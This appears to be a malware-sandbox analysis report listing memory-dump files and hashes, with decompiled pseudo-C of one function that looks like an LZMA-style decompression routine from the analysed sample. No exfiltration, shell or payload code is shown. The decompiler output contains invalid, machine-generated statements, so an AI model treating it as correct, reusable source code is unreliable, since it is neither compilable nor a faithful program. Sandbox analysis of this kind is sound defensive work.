0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x00407366
0x0040732f

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00407234() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
